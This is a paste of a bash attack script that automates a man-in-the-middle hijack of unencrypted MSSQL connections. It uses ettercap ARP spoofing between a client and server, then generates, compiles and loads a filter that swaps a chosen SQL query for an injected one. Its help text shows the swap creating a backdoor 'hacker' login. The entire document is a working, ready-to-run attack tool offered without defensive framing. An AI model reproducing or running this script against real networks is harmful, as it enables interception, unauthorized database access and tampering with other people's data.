SHARE
TWEET

Anitian SQL Inject MITM

anitian Feb 5th, 2016 2,701 Never
  1. #!/bin/bash
  2. #
  3. ####################################################################
  4. #
  5. # Written by Rick Osgood
  6. #
  7. # This script is designed to automate the process of hijacking an
  8. # MSSQL database connection. This script can be used to perform a
  9. # MITM attack between two IP addresses using ettercap and ARP
  10. # spoofing. You also submit an original SQL query and a new SQL
  11. # query. The script will create, compile, and load an ettercap
  12. # filter to replace the original SQL string with your new one.
  13. # This should work on any MSSQL conncetion that is not encrypted.
  14. #
  15. ####################################################################
  16.  
  17. args=("$@") #array to store command line arguments
  18.  
  19. # Set variable defalts
  20. SqlPort=1433
  21. ServerIP="NULL"
  22. ClientIP="NULL"
  23. FileName="NULL"
  24.  
  25. # Help function
  26. print_help(){
  27.         echo "Usage: ./SQLInject.sh -o [original SQL query] -i [new SQL query] -s [MSSQL Server IP]
  28. -c [SQL Client IP]"
  29.         echo ""
  30.         echo "Example: ./SQLInject.sh -o \"SELECT * from Products WHERE ProductID=1;\" -i \"CREATE L
  31. OGIN hacker WITH PASSWORD=\"password01\";\" -s 10.0.1.20 -c 10.0.1.100"
  32.         echo ""
  33.         echo "This script creates an ettercap filter that will identify a SQL string"
  34.         echo "and replace it with a new string. The script will then compile the filter"
  35.         echo "and run ettercap with the filter loaded. Ettercap will perform an ARP"
  36.         echo "spoofing attack against the specified IP addresses automatically. All you"
  37.         echo "have to do is sit back and wait for the original query to be submitted."
  38.         echo ""
  39.         echo " --help"
  40.         echo "     Show this message."
  41.         echo " -o"
  42.         echo "     Specify the original SQL string to be replaced."
  43.         echo " -i"
  44.         echo "     Specify the new SQL string to be injected. This string must not"
  45.         echo "     longer than the original query string."
  46.         echo " -s"
  47.         echo "     Specify the MSSQL server IP for ARP poison attack. May also use gateway IP"
  48.         echo " -c"
  49.         echo "     Specify the SQL cient IP for ARP poison attack."
  50.         echo " -f"
  51.         echo "     Specify the output filename for the ettercap filter."
  52.         echo " -p"
  53.         echo "     Optional. Specifiy the MSSQL traffic port. Defaults to 1433."
  54. }
  55.  
  56. # If not enough arguments then quit
  57. if [ $# -lt "4" ]; then
  58.         print_help
  59.         exit 1
  60. fi
  61.  
  62. COUNTER=0 #Count from zero to number of arguments
  63. while [ $COUNTER -lt $# ]; do
  64.         if [ "${args[$COUNTER]}" == "--help" ]; then
  65.                 print_help
  66.                 exit 0
  67.  
  68.         elif [ "${args[$COUNTER]}" == "-o" ]; then
  69.                 COUNTER=$(($COUNTER+1))
  70.                 OldQuery=${args[$COUNTER]}
  71.  
  72.         elif [ "${args[$COUNTER]}" == "-i" ]; then
  73.                 COUNTER=$((COUNTER+1))
  74.                 NewQuery=${args[$COUNTER]}
  75.  
  76.         elif [ "${args[$COUNTER]}" == "-s" ]; then
  77.                 COUNTER=$((COUNTER+1))
  78.                 ServerIP=${args[$COUNTER]}
  79.  
  80.         elif [ "${args[$COUNTER]}" == "-c" ]; then
  81.                 COUNTER=$((COUNTER+1))
  82.                 ClientIP=${args[$COUNTER]}
  83.  
  84.         elif [ "${args[$COUNTER]}" == "-f" ]; then
  85.                 COUNTER=$((COUNTER+1))
  86.                 FileName=${args[$COUNTER]}
  87.  
  88.         elif [ "${args[$COUNTER]}" == "-p" ]; then
  89.                 COUNTER=$((COUNTER+1))
  90.                 SqlPort=${args[$COUNTER]}
  91.  
  92.         else
  93.                 echo "Error: Unknown argument \"${args[$COUNTER]}\""
  94.                 echo ""
  95.                 print_help
  96.                 exit 1
  97.         fi
  98.  
  99.         COUNTER=$(($COUNTER+1))
  100. done;
  101.  
  102. # Is anything missing?
  103. if [ "$ServerIP" == "NULL" ]; then
  104.         echo "You must specify server IP!"
  105.         exit 1
  106.  
  107. elif [ "$ClientIP" == "NULL" ]; then
  108.         echo "You must specify client IP!"
  109.         exit 1
  110.  
  111. elif [ "$FileName" == "NULL" ]; then
  112.         echo "You must specify the file name for the ettercap filter!"
  113.         exit 1
  114. fi
  115.  
  116. # Calculate length of injected SQL query
  117. length2=`echo $NewQuery | wc -m`
  118. length2=$((length2 - 1))
  119. echo "New string is $length2 bytes"
  120.  
  121. # Calculate length of original SQL query
  122. length1=`echo $OldQuery | wc -m`
  123. length1=$((length1 - 1))
  124. echo "Original string is $length1 bytes"
  125.  
  126. # What's the difference?
  127. difference=$((length1 - length2))
  128. echo "Difference is $difference bytes"
  129.  
  130. # If the new string is too long it won't work
  131. if [ $difference -lt 0 ]; then
  132.         echo ""
  133.         echo "New SQL query is longer than original! Quitting..."
  134.         exit 0
  135. fi
  136.  
  137. temp=""
  138. for i in `seq 1 $difference`;
  139. do
  140.         temp="$temp "
  141. done
  142. PaddedQuery="$NewQuery$temp"
  143. echo "PaddedQuery is \"$PaddedQuery\""
  144. echo ""
  145.  
  146. IFS=$'\n' # change separater to newline only. Required or the for loop skips spaces
  147.  
  148. echo "Converting original query to hex..."
  149. # Convert original query to hex string with NULL padding (How it appears over the wire)
  150. OldQueryHex=""
  151. for line in $(echo $OldQuery | sed -e 's/\(.\)/\1\n/g')
  152. do
  153.         OldQueryHex="$OldQueryHex\x"
  154.         temp=`echo $line | hexdump -C |head -n1 | awk -F"  " {'print $2'} | awk {'print $1'}`
  155.         OldQueryHex="$OldQueryHex$temp"
  156.         OldQueryHex="$OldQueryHex\x00"
  157. done
  158.  
  159. echo "Converting new query to hex..."
  160. # Convert new query to hex string now.
  161. NewQueryHex=""
  162. for line in $(echo $PaddedQuery | sed -e 's/\(.\)/\1\n/g')
  163. do
  164.         NewQueryHex="$NewQueryHex\x"
  165.         temp=`echo $line | hexdump -C |head -n1 | awk -F"  " {'print $2'} | awk {'print $1'}`
  166.         NewQueryHex="$NewQueryHex$temp"
  167.         NewQueryHex="$NewQueryHex\x00"
  168. done
  169.  
  170. echo "Writing ettercap filter now..."
  171.  
  172. # Start writing actual ettercap filter file
  173. echo "if (ip.proto == TCP && tcp.dst == $SqlPort) {" > $FileName
  174. echo "       msg(\"SQL traffic discovered\");" >> $FileName
  175. echo "       if (search(DATA.data,\"$OldQueryHex\")) {" >> $FileName
  176. echo "              msg(\"Found our string!\");" >> $FileName
  177. echo "              replace(\"$OldQueryHex\",\"$NewQueryHex\");" >> $FileName
  178. echo "              msg(\"...and replaced it :)\");" >> $FileName
  179. echo "       }" >> $FileName
  180. echo "}" >> $FileName
  181.  
  182. # Exeute etterfilter to create the compiled filter
  183. etterfilter $FileName -o $FileName.ef
  184.  
  185. # Execute ettercap and load the filter
  186. ettercap -T -q -F ./$FileName.ef -M ARP //$ServerIP// //$ClientIP//
  187.  
  188. echo ""
  189. echo "Completed Successfully!"
RAW Paste Data
Top